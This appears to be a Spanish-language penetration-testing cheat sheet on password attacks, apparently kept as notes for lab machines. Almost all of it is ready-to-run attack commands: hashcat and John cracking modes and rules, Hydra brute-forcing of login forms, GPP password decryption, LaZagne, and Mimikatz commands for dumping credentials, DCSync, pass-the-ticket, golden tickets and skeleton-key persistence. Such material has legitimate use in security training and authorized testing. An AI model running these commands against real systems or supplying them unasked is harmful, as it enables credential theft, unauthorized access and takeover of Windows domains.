Password Attacks
fcrack
fcrackzip -u -D -p /ruta/de/la/wordlist/wordlist.txt <FILE>.zip
Cambiar contraseña de usuario
En este caso, el usuario tenia STATUS_PASSWORD_MUST_CHANGE
smbpasswd -U Caroline.Robinson -r 10.129.89.159
Group Policy Preferences (GPP)
gpp-decrypt
python3 gpp-decrypt.py -f Groups.xml
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Hashcat
hashcat -m 0 hash.txt /ruta/de/la/wordlist/wordlist.txt # MD5
hashcat -m 100 hash.txt /ruta/de/la/wordlist/wordlist.txt # SHA-1
hashcat -m 900 hash.txt /ruta/de/la/wordlist/wordlist.txt # MD4
hashcat -m 1400 hash.txt /ruta/de/la/wordlist/wordlist.txt # SHA256
hashcat -m 3200 hash.txt /ruta/de/la/wordlist/wordlist.txt # BCRYPT
hashcat -m 1000 hash.txt /ruta/de/la/wordlist/wordlist.txt # NTLM
hashcat -m 5600 hash.txt /ruta/de/la/wordlist/wordlist.txt # NTMLv2
hashcat -m 1800 hash.txt /ruta/de/la/wordlist/wordlist.txt # SHA512
hashcat -m 160 hash.txt /ruta/de/la/wordlist/wordlist.txt # HMAC-SHA1
hashcat -m 160 hash.txt /ruta/de/la/wordlist/wordlist.txt # HMAC-SHA1
hashcat -m 18200 -a 0 <FILE> /ruta/de/la/wordlist/wordlist.txt # ASPREPRoast
hashcat -m 13100 --force <FILE> /ruta/de/la/wordlist/wordlist.txt # Kerberoasting
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3
/usr/share/wordlists/fasttrack.txt
/usr/share/hashcat/rules/best64.rule
Reglas personalizadas
Agregar 1 a cada contraseña
echo \$1 > <FILE>.rule
Poner en Mayúscula la primera letra
$1
c
No agregue nada, un 1 o un ! a una lista de palabras existente
:
$1
$!
Regla para letras mayúsculas, valores numéricos y caracteres especiales
$1
agrega un “1”$2
agrega un “2”$3
agrega un “3”c
Pone en mayúscula la primera letra y en minúscula el resto.
$1 c $!
$2 c $!
$1 $2 $3 c $!
Vista previa de la regla
hashcat -r <FILE>.rule --stdout <FILE>.txt
Hydra
hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>
hydra <RHOST> -L <users.txt> -P <passwords.txt> <PROTOCOL>
hydra <RHOST> -C /ruta/de/la/wordlist/wordlist.txt ftp
hydra -l <USERNAME> -P <PASSWORDS> <TARGET> <SERVICE> -s <PORT>
hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/login/:user=^USER^&pass=^PASS^:Invalid password"
John
keepass2john <FILE>
ssh2john id_rsa > <FILE>
zip2john <FILE> > <FILE>
john <FILE> --wordlist=/ruta/de/la/wordlist/wordlist.txt --format=crypt
john <FILE> --rules --wordlist=/ruta/de/la/wordlist/wordlist.txt
john --show <FILE>
# /etc/passwd - /etc/shadow
unshadow passwd shadow > hashes
john --wordlist-/usr/share/wordlists/rockyou.txt hashes
LaZagne
laZagne.exe all
Mimikatz
Mimikatz es una herramienta que permite extraer contraseñas en texto claro, hash, código PIN y tickets kerberos de la memoria. A su vez, también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.
# Comandos comunes
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>
# Dump Hashes
.\mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
# Pass The Ticket
.\mimikatz.exe
sekurlsa::tickets /export
kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$
# Golden Ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
klist
dir \\<RHOST>\admin$
# Skeleton Key
privilege::debug
misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz
pypykatz
pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam system